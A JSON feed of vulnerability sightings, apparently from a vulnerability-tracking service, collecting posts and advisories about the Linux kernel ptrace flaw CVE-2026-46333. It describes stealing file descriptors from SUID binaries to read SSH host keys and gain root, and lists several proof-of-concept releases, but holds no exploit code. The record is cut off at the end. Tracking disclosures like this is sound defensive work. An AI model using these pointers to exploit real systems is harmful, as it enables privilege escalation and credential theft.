{"vulnerability": "cve-2026-4633", "sightings": [{"uuid": "1dfc602e-fbdf-4bcc-81c2-316ffd0d316c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-4633", "type": "seen", "source": "https://access.redhat.com/security/cve/cve-2026-4628", "content": "", "creation_timestamp": "2026-03-24T03:00:03.000000Z"}, {"uuid": "6725e3f4-aec1-428b-88a2-c918c078f1d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/etguenni.bsky.social/post/3mlxnzg2ibk2u", "content": "Neue Linux Kernel Schwachstelle ssh-keysign-pwn (CVE-2026-46333)\n\nborncity.com/blog/2026/05...", "creation_timestamp": "2026-05-16T10:43:04.888495Z"}, {"uuid": "c781c1c5-3765-495b-8fd9-136641687da1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-4633", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mhq3ir4rw52u", "content": "", "creation_timestamp": "2026-03-23T12:42:18.344851Z"}, {"uuid": "04120479-21b4-4220-85cb-469378b5a158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/kiltedtux.bsky.social/post/3mlvh6iykyw2l", "content": "LWN: Seven new stable kernels with patches for CVE-2026-46333\nhttps://lwn.net/Articles/1073060/\n#linux #opensource #tech", "creation_timestamp": "2026-05-15T13:35:24.337253Z"}, {"uuid": "d3e8a9dc-d8bc-4c69-a113-f8cf603b6160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": 
"https://bsky.app/profile/aprosdoketon.bsky.social/post/3mlwg3l5gac2r", "content": "CVE-2026-46333", "creation_timestamp": "2026-05-15T22:48:31.311161Z"}, {"uuid": "2d39b550-98ac-4f8a-8de7-55b369872aa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/fujiwara.bsky.social/post/3mlwhl3ciuj26", "content": "\"ssh-keysign-pwn (CVE-2026-46333): Patched kernels available in testing\"", "creation_timestamp": "2026-05-15T23:16:39.816231Z"}, {"uuid": "0bf2720b-59bb-451f-a6dc-a844fa660af0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/siyeonized.bsky.social/post/3mlyui2k5ek2z", "content": "voy a ver si ma\u00f1ana me pongo a intentar explotar la CVE-2026-46333 o  CVE-2026-31431 que parec\u00eda sencilla para m\u00ed TFM", "creation_timestamp": "2026-05-16T22:11:23.020959Z"}, {"uuid": "ddb46cd6-0e45-4370-80b5-a91aa8c7e807", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-46333", "type": "seen", "source": "https://social.tchncs.de/users/gborn/statuses/116583837638116996", "content": "Neue Linux Kernel Schwachstelle ssh-keysign-pwn (CVE-2026-46333)\nhttps://borncity.com/blog/2026/05/16/linux-schwachstelle-ssh-keysign-pwn-cve-2026-46333-ermoeglicht-fremdzugriff-auf-dateien/", "creation_timestamp": "2026-05-16T10:43:07.372079Z"}, {"uuid": "8c8f3434-353f-44e6-b117-ef77bf26cd78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/ostechnix.bsky.social/post/3mm4qjgkvbk23", "content": "Linux Kernel 7.0.8 is 
released with patches to fix the ssh-keysign-pwn (CVE-2026-46333) root exploit flaw. Update your Linux system today.\n\nMore details here: ostechnix.com/linux-kernel... \n\n#Linux #Kernel708 #ssh_keysign_pwn #CVE_2026_46333 #Rootexploit #Security #Kernelpatch", "creation_timestamp": "2026-05-18T11:11:19.137729Z"}, {"uuid": "95d472ec-2f6c-4edf-98ce-e1e9a92bdd31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sn0.bsky.social/post/3mlz5blqdgkk2", "content": "\u3046\u30fc\u3093\u2026Linux\u306e\u5b89\u5168\u795e\u8a71\u3092\u6839\u62e0\u306b\u4f7f\u3046\u306e\u3082\u96e3\u3057\u304f\u306a\u3063\u3066\u304f\u308b\u308f\u306d\nssh-keysign-pwn (CVE-2026-46333)", "creation_timestamp": "2026-05-17T00:51:20.412189Z"}, {"uuid": "a8ca22b2-3413-42b8-8496-5d7c7b03d15c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlzcx6mem62h", "content": "Top 3 CVE for last 7 days:\nCVE-2026-42511: 56 interactions\nCVE-2026-46300: 56 interactions\nCVE-2026-42897: 51 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-45062: 11 interactions\nCVE-2020-17103: 8 interactions\nCVE-2026-46333: 5 interactions\n", "creation_timestamp": "2026-05-17T02:41:52.018844Z"}, {"uuid": "967cefb2-606d-4767-b511-22fe23e5c637", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "Telegram/mjKYtwBGh-p48w8zvyK_dmOaa4JWuY9k0ugNTHKD_EJnGeA", "content": "", "creation_timestamp": "2026-05-16T07:00:12.000000Z"}, {"uuid": "c67f3342-739e-489c-9bc4-9b6fc9096389", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "Telegram/qFnncewX_FdOxDivGoEqJX19AvA6N2dSwzORt9UZIQWFUQU", "content": "", "creation_timestamp": "2026-05-17T02:07:47.000000Z"}, {"uuid": "77d64444-0938-494a-8426-d059bfd9c3a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "Telegram/0LL51wE7H3pCot1BGYY3QqExSd1a0DM520erihe1hgvov-s", "content": "", "creation_timestamp": "2026-05-17T09:00:05.000000Z"}, {"uuid": "40a2872c-80b2-4b13-ad82-4c6ef547a167", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/84533", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a public-passwd\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Aurillium\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-17 06:55:55\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nUse CVE-2026-46333 and CVE-2026-31431 to change any user's password.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-17T07:00:04.000000Z"}, {"uuid": "4b65bf78-5827-4eaf-9d39-bc4ebb125864", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "Telegram/eJ_XuJ4mBNd-lwylDxspegor_v8Aby9HvlFsNuzO9g9tQUM", "content": "", 
"creation_timestamp": "2026-05-17T11:00:11.000000Z"}, {"uuid": "644f0943-99a5-4579-aa9b-7cfa5f2e0534", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "Telegram/AKvzzPS6cRH5e3-Ghbw0kwesBlioL1QWpK2eWbvMSndUnWE", "content": "", "creation_timestamp": "2026-05-17T15:00:07.000000Z"}, {"uuid": "18098098-86cf-4b2a-aaf8-7709040fcf74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/kravietz.agora.echelon.pl.ap.brid.gy/post/3mlvyzmoz5zp2", "content": "What a week\u2026 #Linux ssh-keysign-pwn (CVE-2026-46333):\n\nMitigation (breaks `strace`, `gdb` etc)\n\n\n    sudo sysctl -w kernel.yama.ptrace_scope=3\n    echo 'kernel.yama.ptrace_scope = 3' | sudo tee /etc/sysctl.d/99-ssh-keysign-pwn.conf\n\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2026-46333", "creation_timestamp": "2026-05-15T18:56:26.542378Z"}, {"uuid": "a71002bf-43ff-4788-a217-862533229b65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mm3wjmfexe22", "content": "Linux Kernel ptrace Exit-race Vulnerability / ssh-keysign-pwn (CVE-2026-46333) \u2014 Mitigation and Kernel Update on CloudLinux Right after the kernel privilege-escalation chain in the XFRM/ESP subsy...\n\n#KernelCare #CVE #Vulnerability #Live #Patching #kernel [\u2026] \n\n[Original post on blog.cloudlinux.com]", "creation_timestamp": "2026-05-18T03:31:41.049044Z"}, {"uuid": "c5e6b651-c152-4f2e-99a7-ecf95b4367cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", 
"type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3173", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u0438 get_dumpable() \u044f\u0434\u0440\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Linux \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u043c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0432\u043e\u0437\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 \u043d\u0430 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c, \u0446\u0435\u043b\u043e\u0441\u0442\u043d\u043e\u0441\u0442\u044c \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u043c\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438\n\nBDU:2026-06912\nCVE-2026-46333\n\n\u0412 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0442 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0442\u044c\u0441\u044f \"\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u043e 
\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c LINUX\", \u0438\u0437\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043c\u0435\u0442\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0435 \u0424\u0421\u0422\u042d\u041a \u0420\u043e\u0441\u0441\u0438\u0438, \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0451\u043d\u043d\u043e\u043c 25 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430.\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\n\n\u0414\u043b\u044f Linux:\nhttps://lore.kernel.org/linux-cve-announce/2026051554-CVE-2026-46333-662a@gregkh/\nhttps://git.kernel.org/stable/c/01363cb3fbd0238ffdeb09f53e9039c9edf8a730\nhttps://git.kernel.org/stable/c/15b828a46f305ae9f05a7c16914b3ce273474205\nhttps://git.kernel.org/stable/c/2a93a4fac7b6051d3be7cd1b015fe7320cd0404d\nhttps://git.kernel.org/stable/c/4709234fd1b95136ceb789f639b1e7ea5de1b181\nhttps://git.kernel.org/stable/c/6e5b51e74a40d377bcd3081dd33fbaa0e1aa7e3d\nhttps://git.kernel.org/stable/c/8f907d345bae8f4b3f004c5abc56bf2dfb851ea7\nhttps://git.kernel.org/stable/c/93d4ba49d18e3d7fb41a9927c2d0cca5e9dfefd6\n\n\u0414\u043b\u044f Debian GNU/Linux:\nhttps://security-tracker.debian.org/tracker/CVE-2026-46333\n\n\u0414\u043b\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Red Hat Inc.:\nhttps://access.redhat.com/security/cve/cve-2026-46333", "creation_timestamp": "2026-05-18T14:18:14.000000Z"}, {"uuid": "7237abaf-9ad0-4807-8be9-66a6ba8e4c61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"cve-2026-46333", "type": "seen", "source": "https://bsky.app/profile/norviktech.bsky.social/post/3mm5hr3xm5t2n", "content": "La vulnerabilidad CVE-2026-46333 fue divulgada por Qualys el 15 de mayo y se refiere a un error en ptracemayaccess() que puede permitir a los pods de Kubernetes acceder a recursos de manera no autorizada.\n\nhttps://norvik.tech/news/analisis-cve-2026-46333-kubernetes", "creation_timestamp": "2026-05-18T18:07:27.278174Z"}, {"uuid": "5dff88a7-80d7-4338-a021-b1cf14d78e19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/getpacketai.bsky.social/post/3mm5kqfindv2c", "content": "CVE-2026-46333 lets Kubernetes pods steal file descriptors when seccomp is unset or Unconfined\u2014but RuntimeDefault stops it. Critical findings for securing your\u2026\n\nhttps://www.reddit.com/r/kubernetes/comments/1tg1cd8/cve202646333_in_kubernetes_unset_seccomp_let_pods/\n\n#cloud #AWS", "creation_timestamp": "2026-05-18T19:00:23.809991Z"}, {"uuid": "bc7ae384-24e8-4749-9132-aba5caa2595d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://hachyderm.io/users/ChrisShort/statuses/116598433590858492", "content": "AI Discovers CVE-2026-46333 Linux Kernel Vulnerability #devopsish https://linuxstans.com/ai-just-found-another-linux-zero-day-and-security-researchers-are-freaking-out/", "creation_timestamp": "2026-05-19T00:35:04.585846Z"}, {"uuid": "c9f12cfa-5449-496e-9795-b4477d7ec8d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/limura.bsky.social/post/3mmc3zbcskc2s", "content": "\u3075\u3047\u3047 / 
2\u4ef6\u306e\u30b3\u30e1\u30f3\u30c8  \u201cLinux Kernel\u306e\u8106\u5f31\u6027(ssh-keygen-pwn: Important: CVE-2026-46333) - SIOS SECURITY BLOG\u201d htn.to/3mugTEWhZD", "creation_timestamp": "2026-05-20T14:20:21.919382Z"}, {"uuid": "8072b07b-bd83-4995-9b3e-766bdce1585e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mmb7g74bycjl", "content": "CVE-2026-46333 (ssh-keysign-pwn) Linux kernel vulnerability mitigations | Ubuntu https://ubuntu.com//blog/ssh-keysign-pwn-linux-vulnerability-fixes-available", "creation_timestamp": "2026-05-20T05:49:07.052677Z"}, {"uuid": "fd2eb857-cddb-4d8d-9f0a-40f00cd95635", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://t.me/ctinow/250600", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path\nhttps://ift.tt/Dl5d2LC", "creation_timestamp": "2026-05-20T15:49:31.000000Z"}, {"uuid": "53e8a97e-062e-44da-9b41-d20b08a7a0f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mmcf64vjjtf2", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Uncategorized #Vulnerabilities #and #Threat #Research [\u2026] \n\n[Original post on blog.qualys.com]", "creation_timestamp": "2026-05-20T17:05:33.200476Z"}, {"uuid": "208ac6d2-754c-4f56-9479-be0fc2b3e72e", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mmci6mvhshp2", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Vulnerabilities #and #Threat #Research #security #vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-20T17:58:19.606255Z"}, {"uuid": "e38216d0-788e-4738-9815-3e37d59ff74c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/jschauma.mstdn.social.ap.brid.gy/post/3mmcki3g4jrc2", "content": "Qualys has published their full write-up of CVE-2026-46333: https://www.openwall.com/lists/oss-security/2026/05/20/15\n\nThis includes a PoC to full root via `accounts-daemon` demonstrated in Debian 13, Fedora Workstation 43/44, so goes well beyond the initial \"you need a program that opens a [\u2026]", "creation_timestamp": "2026-05-20T18:39:19.243008Z"}, {"uuid": "4f5db1d2-39da-44f2-848f-663561d8e219", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3mmclxxaxf22x", "content": "Logic bug in the Linux kernel's __ptrace_may_access() function (CVE-2026-46333)\nDiscussion | lobsters | Author: fro", "creation_timestamp": "2026-05-20T19:05:49.841076Z"}, {"uuid": "84a88285-2a72-478b-8619-3ecb081bc316", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": 
"seen", "source": "https://bsky.app/profile/lobsters-feed.bsky.social/post/3mmcm7j5rbt2p", "content": "Logic bug in the Linux kernel's __ptrace_may_access() function (CVE-2026-46333) https://lobste.rs/s/nwdn3w #security #linux ", "creation_timestamp": "2026-05-20T19:10:03.744503Z"}, {"uuid": "fb0dfd6f-0fc9-4f93-9d4a-0c9cc6eaffa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/cyberkendra.com/post/3mmdky5t32s2v", "content": "\ud83d\udd34 CVE-2026-46333 \u2014 Linux Kernel ptrace Flaw, Full Advisory Released\nQualys today published the complete advisory for a nine-year-old Linux kernel flaw that lets any local unprivileged user.\n\nRead Detail- www.cyberkendra.com/2026/05/nine...\n#linux #security #vulnerability #infosec", "creation_timestamp": "2026-05-21T04:20:50.340207Z"}, {"uuid": "c30fe6c0-5773-4266-8f76-33d5243be68f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "Telegram/_t5JFSPSOfbQz9kScpjpGdxXGShVNgFAEjUbRg__tg-gk3Q", "content": "", "creation_timestamp": "2026-05-20T07:00:15.000000Z"}, {"uuid": "d6f75376-9703-4512-8749-e6a3c57db5a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://gist.github.com/alon710/9c0d20e9d0fe058b907c7e32ba953536", "content": "# CVE-2026-46333: CVE-2026-46333: Local Information Disclosure in Linux Kernel Process Exit Path\n\n&gt; **CVSS Score:** 7.1\n&gt; **Published:** 2026-05-15\n&gt; **Full Report:** https://cvereports.com/reports/CVE-2026-46333\n\n## Summary\nCVE-2026-46333 is a high-severity race condition in the Linux kernel process management subsystem, specifically 
involving the get_dumpable() logic during process exit. Local attackers can exploit this timing window to hijack file descriptors belonging to privileged SUID/SGID processes, leading to the disclosure of sensitive files such as SSH private keys and shadow password hashes.\n\n## TL;DR\nA race condition in the Linux kernel process exit sequence allows local unprivileged users to steal open file descriptors from SUID processes. By targeting binaries like ssh-keysign, attackers can read root-owned files such as SSH host keys.\n\n## Exploit Status: WEAPONIZED\n\n## Technical Details\n\n- **Vulnerability Class**: Race Condition (CWE-362)\n- **Attack Vector**: Local (AV:L)\n- **CVSS v3.1 Score**: 7.1 (High)\n- **EPSS Score**: 0.01% (0.44th percentile)\n- **Exploit Status**: Weaponized PoC Available\n- **CISA KEV**: Not Listed\n- **Primary Target**: /usr/lib/openssh/ssh-keysign\n\n## Affected Systems\n\n- Linux Kernel\n- Ubuntu\n- Red Hat Enterprise Linux\n- **Linux Kernel Mainline**: &lt; 7.1-rc4 (Fixed in: `7.1-rc4`)\n- **Linux Kernel Stable (6.18.x)**: &lt; 6.18.31 (Fixed in: `6.18.31`)\n- **Ubuntu Linux**: 14.04 - 26.04 (Fixed in: `TBD`)\n\n## Mitigation\n\n- Upgrade the Linux kernel to a version containing commit 93d4ba49d18e3d7fb41a9927c2d0cca5e9dfefd6.\n- Restrict ptrace access globally using the Yama security module.\n- Monitor audit logs for unexpected pidfd_getfd usage or unprivileged ptrace attempts against SUID binaries.\n\n**Remediation Steps:**\n1. Verify the current kernel version using 'uname -r'.\n2. Apply updates via the distribution package manager (e.g., 'apt upgrade linux-image-generic' or 'dnf update kernel').\n3. Reboot the system to load the patched kernel.\n4. If patching is delayed, execute 'sudo sysctl -w kernel.yama.ptrace_scope=2' as a temporary measure.\n5. 
Persist the workaround by running 'echo \"kernel.yama.ptrace_scope=2\" | sudo tee /etc/sysctl.d/99-ptrace.conf'.\n\n## References\n\n- [NVD Vulnerability Details](https://nvd.nist.gov/vuln/detail/CVE-2026-46333)\n- [Red Hat Advisory RHSB-2026-004](https://access.redhat.com/security/vulnerabilities/RHSB-2026-004)\n- [Ubuntu Security Blog: ssh-keysign-pwn](https://ubuntu.com/blog/ssh-keysign-pwn-linux-vulnerability-fixes-available)\n\n\n---\n*Generated by [CVEReports](https://cvereports.com/reports/CVE-2026-46333) - Automated Vulnerability Intelligence*", "creation_timestamp": "2026-05-21T04:00:50.000000Z"}, {"uuid": "27eb87f4-9c77-42ce-a0d0-dc500be9cfa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mmdxj4fwrbm2", "content": "9-Year-Old Linux Kernel Flaw Enables Root Command Execution on Major Distros TheHackerNews CVE-2026-46333 is a nine-year Linux kernel improper privilege management flaw introduced in November 2016 ...\n\n#Security #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-21T08:05:05.305824Z"}, {"uuid": "1be51d00-631c-4730-bf96-616f94fc0ead", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sec-news-bot.bsky.social/post/3mmdzpjqzqn23", "content": "Linux \u30ab\u30fc\u30cd\u30eb\u306e9\u5e74\u524d\u306e\u8106\u5f31\u6027\u304c\u7279\u5b9a\u3001\u6839\u6a29\u9650\u596a\u53d6\u306e\u5371\u967a\n\n2016\u5e7411\u6708\u306b\u5c0e\u5165\u3055\u308c\u305f CVE-2026-46333 \u306f\u3001Linux \u30ab\u30fc\u30cd\u30eb\u306e\u6a29\u9650\u7ba1\u7406\u306e\u4e0d\u5099\u306b\u3088\u308a root 
\u6a29\u9650\u3067\u306e\u4efb\u610f\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u304c\u53ef\u80fd\u3002CVSS \u30b9\u30b3\u30a2 5.5\u3002\u4e3b\u8981 Linux \u30c7\u30a3\u30b9\u30c8\u30ed\u304c\u5f71\u97ff\u3092\u53d7\u3051\u308b\u3002\n\n#CVE #\u8106\u5f31\u6027 #\u60c5\u5831\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3", "creation_timestamp": "2026-05-21T08:44:19.159697Z"}, {"uuid": "00939bd9-db0f-44c2-9b1d-478581b179bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/deafnews-auto.bsky.social/post/3mme3qlv3sl2i", "content": "CVE-2026-46333: Nine-Year-Old Linux Kernel Flaw Enables Root Escalation", "creation_timestamp": "2026-05-21T09:20:43.102156Z"}, {"uuid": "78735610-3538-4bee-b283-c1cc42d15aba", "vulnerability_lookup_origin": 